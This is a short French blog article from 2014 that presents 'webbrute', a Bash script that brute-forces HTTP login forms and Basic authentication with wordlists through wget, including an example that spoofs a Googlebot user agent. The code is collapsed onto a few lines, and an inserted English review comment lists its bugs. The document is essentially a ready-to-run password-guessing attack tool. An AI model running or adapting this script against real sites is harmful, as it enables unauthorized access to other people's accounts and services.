Cet article présente un script Bash de bruteforce sur le protocole HTTP via les méthodes GET/POST et l'authentification BASIC
0x01. WEBBRUTE
#!/bin/bash # # Settings, do not edit this, variables can be set using parameters # APP="webbrute" VERBOSE=0 tmp="/tmp/.wget.bf" V="\\e[1;32m" Y="\\e[1;33m" B="\\e[1;29m" N="\\e[0m" P="0" # 0 to match, 1 to not match # # Synopsis # function usage { echo " Usage : $APP <-u url> <-d get-data> <-f dictionary> <-p pattern> [-c cookie] [-v] [-i] [-P|-B] [-U useragent] -d GET/POST data -f dictionary file -p pattern to match -i mismatch patter instead of match -c cookie data -v verbose -P use post instead of get method -B use basic authenticaton instead of get method -U set useragent, default is : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' Exemple: $APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'pass=FUZZPASS' -f passwords.lst -p BIENVENUE > GET authentication bruteforce, using one field $APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'admin=FUZZUSER&pass=FUZZPASS&submit=Login' -f passwords.lst,usernames.lst \\ -p Incorrect -i -c 'PHPSESSID=123456789; Date=123456789;' -P -U 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' > POST athentication bruteforce (-P), too file are needed to brutefroce login/pass (passwords.lst,usernames.lst), if not match (-i) Incorrect then login success, use custom cookie and custom useragent " exit $1 } [ $# -eq 0 ] && usage 0 [ $# -gt 15 ] && usage 1 [ $# -lt 8 ] && usage 1 # Empty values ... 
#
# webbrute, as extracted from the article: the script has been collapsed onto a
# few physical lines, so the original line breaks (and with them the exact
# statement boundaries) are not recoverable from this copy. The notes below
# describe what the visible code does; run-time behaviour is inferred, not
# verified.
#
# Flow:
#   - getopts "d:u:f:p:c:ihvwPBU:": -u url, -d request data carrying the
#     FUZZUSER / FUZZPASS markers, -f wordlist (two comma-separated files when
#     both markers are present), -p pattern for grep -iE, -i inverts the
#     pattern test (P=1: *no* match counts as success), -c cookie, -P POST,
#     -B Basic auth header, -v verbose.
#   - F=1 is set whenever FUZZUSER is absent from -d (even if FUZZPASS is
#     absent too), F=2 when both markers are present; only F=0 reaches usage.
#   - One wget request per candidate; the response body is piped to
#     grep -iE "$pattern" and grep's exit status is compared with P. That
#     body-pattern test is the only success oracle: the HTTP status, timeouts
#     and any rate-limit or lockout response are never inspected, and a
#     request that produces no body presumably fails the match, which in -i
#     mode is reported as "Found" (the "potential wrong positive" warning
#     fires only when the hit is on the very first attempt, i == 1).
#   - The loop stops at the first hit (break in single-field mode, exit in
#     two-field mode).
#
# NOTE(review) — observations on the code as shown, not fixes:
#   - The case statement has two u) arms and no U) arm, so -U never assigns
#     useragent; the default "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
#     6.1)" string is what the script always sends.
#   - $cookie is deliberately left unquoted so "--header 'Cookie: ...'" splits
#     into arguments, but the literal single quotes survive word-splitting and
#     presumably travel as part of the header value — confirm.
#   - In -B mode the base64 payload is built from the raw password (F=1) or
#     from "$field_user=$BF_USER&$field_pass=$BF_PASS" (F=2); in both cases
#     the candidate is passed to printf as its *format* string, so '%' or '\'
#     in a wordlist entry alters the encoded value.
#   - field_data is "cut -d'&' -f3-", i.e. everything after the second
#     '&'-separated field; with a single FUZZPASS field any static fields that
#     follow it are dropped — depends on the -d layout.
#   - tmp="/tmp/.wget.bf" is assigned and never used; "w" is accepted by
#     getopts but has no arm; [ -z $field_user ], [ $e -eq $P ] etc. use
#     unquoted test operands and break on empty or space-containing values.
#   - numline in single-field mode is derived from "cat -b" line numbering;
#     cat -b skips blank lines, so the "Tried x / y" counter and the read
#     loop (which does see blank lines) can disagree.
#
data="" ; url="" ; file="" ; pattern="" ; cookie="" # Default action : GET post=0 ; basic=0 # Default useragent useragent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" # Number of words i=0 # Parse arguments while getopts "d:u:f:p:c:ihvwPBU:" option do case $option in d) data=$OPTARG ;; u) url=$OPTARG ;; f) file=$OPTARG ;; p) pattern=$OPTARG ;; c) cookie="--header 'Cookie: $OPTARG'" ;; v) VERBOSE=1 ;; i) P="1" ;; P) post=1 ; basic=0 ;; B) basic=1 ; post=0 ;; u) useragent=$OPTARG ;; h) usage 0 ;; esac done # # Parse data # F=0 field_user=$(echo $data |grep -oE "([a-z]){1,}=FUZZUSER" |cut -d'=' -f1) [ -z $field_user ] && F=1 field_pass=$(echo $data |grep -oE "([a-z]){1,}=FUZZPASS" |cut -d'=' -f1) [ ! -z $field_user ] && [ ! -z $field_pass ] && F=2 field_data=$(echo $data |cut -d'&' -f3-) [ $F -eq 0 ] && usage 1 [ $basic -eq 1 ] && action="BASIC" [ $post -eq 1 ] && action="POST" [ $basic -eq 0 -a $post -eq 0 ] && action="GET" # # Bruteforce one field : pass # if [ $F -eq 1 ] ; then numline=$(cat -b $file |awk {'print $1'} |grep -oE "^([0-9]){1,}" |tail -n 1) echo while read BF_PASS do i=$((i+1)) printf "\\r[$action] Tried : %5s passes / %5s " "$i" "$numline" [ $VERBOSE -ne 0 ] && printf "\\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS" if [ $post -eq 1 ]; then wget -q --user-agent "$useragent" $cookie --post-data="$field_pass=$BF_PASS&$field_data" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? elif [ $basic -eq 1 ]; then B64_DATA=$(printf "$BF_PASS"|base64) wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? else wget -q --user-agent "$useragent" $cookie "$url?$field_pass=$BF_PASS&$field_data" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? fi if [ $e -eq $P ] ; then [ $i -eq 1 ] && printf "\\n\\n$Y""Warning: potential wrong positive detected. 
Please check arguments.$N" printf "\\n\\nFound: $B$field_pass$N = $V $BF_PASS$N\\n\\n" break fi done < $file fi # # Bruteforce two fields : user & pass # if [ $F -eq 2 ] ; then file_user=$(echo $file|cut -d',' -f1) file_pass=$(echo $file|cut -d',' -f2) num_user=$(cat -b $file_user|tail -n1|awk '{ print $1 }') num_pass=$(cat -b $file_pass|tail -n1|awk '{ print $1 }') numline=$((num_user*num_pass)) echo while read BF_USER do while read BF_PASS do i=$((i+1)) printf "\\r[$action] Tried : %5s passes / %5s " "$i" "$numline" [ $VERBOSE -ne 0 ] && printf "\\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS" if [ $post -eq 1 ]; then wget -q --user-agent "$useragent" $cookie --post-data="$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? elif [ $basic -eq 1 ]; then B64_DATA=$(printf "$field_user=$BF_USER&$field_pass=$BF_PASS"|base64) wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? else wget -q --user-agent "$useragent" $cookie "$url?$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? fi if [ $e -eq $P ] ; then [ $i -eq 1 ] && printf "\\n\\n$Y""Warning: potential wrong positive detected. Please check arguments.$N" printf "\\n\\nFound: $B$field_user$N = $V $BF_USER$N \\t $B$field_pass$N = $V $BF_PASS$N\\n\\n" exit fi done < $file_pass done < $file_user fi # # Nice style # printf "\\n\\n"
=> Écrit par : Nicolas, le 07 juillet 2014